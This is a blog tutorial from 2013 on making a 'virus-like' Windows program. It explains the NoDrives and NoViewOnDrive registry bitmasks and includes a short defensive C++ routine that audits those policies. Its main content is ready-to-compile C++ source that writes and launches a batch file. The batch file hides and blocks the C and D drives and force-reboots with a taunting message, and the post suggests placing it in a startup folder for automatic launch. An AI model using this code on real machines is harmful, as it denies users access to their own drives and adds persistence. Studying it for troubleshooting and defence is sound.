Thursday, July 11, 2013

Understanding simple viruses and their interactions with HKEYs

Let me begin this blog by saying that building a virus to attack a computer or network that is not yours, or which you are not authorised to attack, is highly illegal. This tutorial is only for educational purposes. This code is presented "as is" and you should not use it--unless you can figure out how to undo it on your own...

That being said--today we are going to discuss how to make a simple Windows XP virus-like program that makes your hard drives appear to disappear. They aren't really gone--just hidden.

How do we do this? Registry (HKEY) values. Each drive letter has a bit value: drive A is 1, drive B is 2, drive C is 4, drive D is 8, drive E is 16, etc. The value doubles all the way to the Z drive. To hide more than one drive, add their values: for the A and D drives that is A+D, i.e. 1+8=9; for the C and D drives it is 4+8=12.

This is what the line REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer /v NoDrives /t REG_DWORD /d 12 accomplishes. NoDrives keeps Explorer from displaying the drives; NoViewOnDrive (set the same way, with the same bitmask) blocks access to them. Both values live under HKEY_LOCAL_MACHINE, so writing them requires administrator rights.
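One way to audit a machine for this policy, as an added example that is not code from the post: the two helper functions convert between the bitmask and drive letters and are portable, while on Windows readPolicy uses RegGetValueA to read NoDrives and NoViewOnDrive from both HKLM and HKCU, because Explorer honours the policy from either hive. The key path and value names are the ones from the post; the function names are my own, and on Windows you may need to link with -ladvapi32.

```cpp
// Added example, not the post's code: decode/encode the NoDrives / NoViewOnDrive mask and, on
// Windows, report which drives the Explorer policy under HKLM or HKCU currently hides or blocks.
#include <cctype>
#include <cstdint>
#include <iostream>
#include <string>
#ifdef _WIN32
#include <windows.h>
#endif
// Bit n stands for drive 'A' + n: A = 1, B = 2, C = 4, ... Z = 1 << 25.
std::string drivesFromMask(uint32_t mask) {
    std::string letters;
    for (int bit = 0; bit < 26; ++bit)
        if (mask & (1u << bit)) letters += static_cast<char>('A' + bit);
    return letters;
}
// Inverse of the above: "CD" -> 12, "AD" -> 9. Non-letters are ignored.
uint32_t maskFromDrives(const std::string& letters) {
    uint32_t mask = 0;
    for (unsigned char c : letters) {
        int u = std::toupper(c);
        if (u >= 'A' && u <= 'Z') mask |= 1u << (u - 'A');
    }
    return mask;
}
#ifdef _WIN32
// Read one REG_DWORD under the Explorer policies key of `root`; false means the value is not set.
bool readPolicy(HKEY root, const char* name, uint32_t& out) {
    DWORD data = 0, size = sizeof(data);
    LONG rc = RegGetValueA(root, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",
                           name, RRF_RT_REG_DWORD, nullptr, &data, &size);
    if (rc != ERROR_SUCCESS) return false;
    out = data; return true;
}
#endif
int main() {
#ifdef _WIN32
    const HKEY roots[] = {HKEY_LOCAL_MACHINE, HKEY_CURRENT_USER};
    const char* names[] = {"NoDrives", "NoViewOnDrive"};
    for (int i = 0; i < 2; ++i)
        for (const char* n : names) {
            uint32_t v;
            if (readPolicy(roots[i], n, v))
                std::cout << (i == 0 ? "HKLM" : "HKCU") << " " << n << " = " << v << " -> " << drivesFromMask(v) << "\n";
        }
#else
    std::cout << "mask 12 -> " << drivesFromMask(12) << "\n"; // prints CD
#endif
    return 0;
}
```

On a clean machine neither value is present, so the Windows build prints nothing; any line it does print names the drives currently hidden or blocked by policy.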


This is the code you will need. Copy it and save it as a .cpp file. This code was compiled with the Cygwin compiler and will need different headers and libraries if you intend to use something like Visual C++. Cygwin is a good Unix emulator. However, you must compile your .cpp file in the folder where cyggcc_s-1.dll, cygstdc++-6.dll and cygwin1.dll are stored, or it will not compile. In addition, when you execute your a.exe file, the three above-mentioned .dll files must be in the same folder.

Yes--I could have made the package more elegant--but since this is not intended to actually be used as a "real" virus, I thought I'd leave some mystery to deployment.

That being said, this is the code.

#include <fstream>    // std::ofstream
#include <windows.h>  // ShellExecuteA and SW_SHOWNORMAL (pulls in shellapi.h)

using namespace std;

int main()
{
    // Open (or create) the batch file that will carry the registry commands.
    ofstream write("V9.bat");

    // Hide the C and D drives (4 + 8 = 12) from Explorer.
    write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n";

    // Block access to the same drives, so typing a path into Run does not get around the hiding.
    write << "REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer /v NoViewOnDrive /t REG_DWORD /d 12\n";

    // Force a reboot so Explorer picks up the new policy values.
    write << "shutdown -r -c \"Your computers drives belong to us\" -f" << "\n";
    write << "Resistance is futile";

    write.close(); // flush and close the file before launching it

    // Run the batch file. The ANSI variant is used explicitly so the char* arguments
    // compile whether or not UNICODE is defined; link with -lshell32 if needed.
    ShellExecuteA(NULL, "open", "V9.bat", NULL, NULL, SW_SHOWNORMAL);

    return 0;
}

This is what the code does when it executes. Pardon the blurry image.


And this is what the computer looked like when it fired up again. Yes--for all those nerds out there wondering--I was testing it in a VirtualBox VM. Notice that the only thing visible is the E drive. C and D are gone.

Notice that you could just copy/paste all the commands that are sent to the .bat file, create the file yourself and store it in a computer's start-up folder so it launches on its own...

As you can see, HKEYs (registry keys) can often be the key to creating viruses--and the first place to look when troubleshooting for one on your own machine.